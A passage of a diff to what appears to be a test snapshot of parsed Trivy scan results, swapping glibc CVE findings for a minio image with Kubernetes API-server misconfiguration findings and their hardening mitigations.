"https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "LOW", @@ -57290,57 +57106,115 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0010", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0010", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "category": "Misconfiguration", + "description": "Limit the rate at which the API server accepts requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", + "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/kcv0010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV0012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/ksv0012", + ], + }, + "category": "Misconfiguration", + "description": "Always pull images.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", + "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv0012", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0013", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0013", + ], + }, + "category": "Misconfiguration", + "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", + "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://avd.aquasec.com/misconfig/kcv0013", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0018", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/kcv0018", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "LOW", @@ -57348,62 +57222,115 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0019", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0019", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "category": "Misconfiguration", + "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", + "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://avd.aquasec.com/misconfig/kcv0019", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0020", + ], + }, + "category": "Misconfiguration", + "description": "Retain the logs for at least 30 days or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", + "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/kcv0020", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0021", + ], + }, + "category": "Misconfiguration", + "description": "Retain 10 or an appropriate number of old log files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", + "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://avd.aquasec.com/misconfig/kcv0021", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0022", + ], + }, + "category": "Misconfiguration", + "description": "Rotate log files on reaching 100 MB or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", + "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/kcv0022", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "LOW", @@ -57411,130 +57338,289 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv021", + }, + { + "type": "URL", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], "severity": "LOW", @@ -57542,1643 +57628,1718 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "fixedVersion": "2.8.2-beta.1", + "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / 